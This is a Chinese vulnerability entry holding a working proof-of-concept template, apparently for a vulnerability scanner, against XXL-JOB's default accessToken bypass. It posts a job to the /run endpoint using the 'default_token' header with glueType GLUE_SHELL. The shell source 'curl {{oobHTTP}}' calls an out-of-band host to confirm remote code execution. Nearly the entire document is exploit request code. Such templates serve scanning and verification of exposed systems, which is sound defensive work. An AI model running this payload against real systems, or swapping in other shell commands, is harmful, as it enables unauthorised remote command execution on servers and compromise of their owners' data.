漏洞描述
XXL-JOB 默认 accessToken 身份绕过,可导致远程代码执行 (RCE) 攻击。
xxl-job-default-token-bypass-rce: XXL-JOB 默认 accessToken 身份绕过漏洞
PoC代码[已公开]
id: xxl-job-default-token-bypass-rce
info:
name: XXL-JOB 默认 accessToken 身份绕过漏洞
author: zan8in
severity: critical
verified: true
description: |-
XXL-JOB 默认 accessToken 身份绕过,可导致远程代码执行 (RCE) 攻击。
reference:
- https://mp.weixin.qq.com/s/vk1VYGfyE_U3O_1EoQThXw
- https://mp.weixin.qq.com/s/KzrjRgYZHewskRzrkOUnEA
tags: xxl-job,rce,bypass
created: 2023/08/22
set:
oob: oob()
oobHTTP: oob.HTTP
nowtime: timestamp_second(0)
timestr: string(nowtime) + "000"
rules:
r0:
request:
method: POST
path: /run
headers:
XXL-JOB-ACCESS-TOKEN: default_token
Cookie: XXL_JOB_LOGIN_IDENTITY=0
Content-Type: application/json
body: |
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": {{timestr}},
"glueType": "GLUE_SHELL",
"glueSource": "curl {{oobHTTP}}",
"glueUpdatetime": {{timestr}},
"broadcastIndex": 0,
"broadcastTotal": 0
}
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()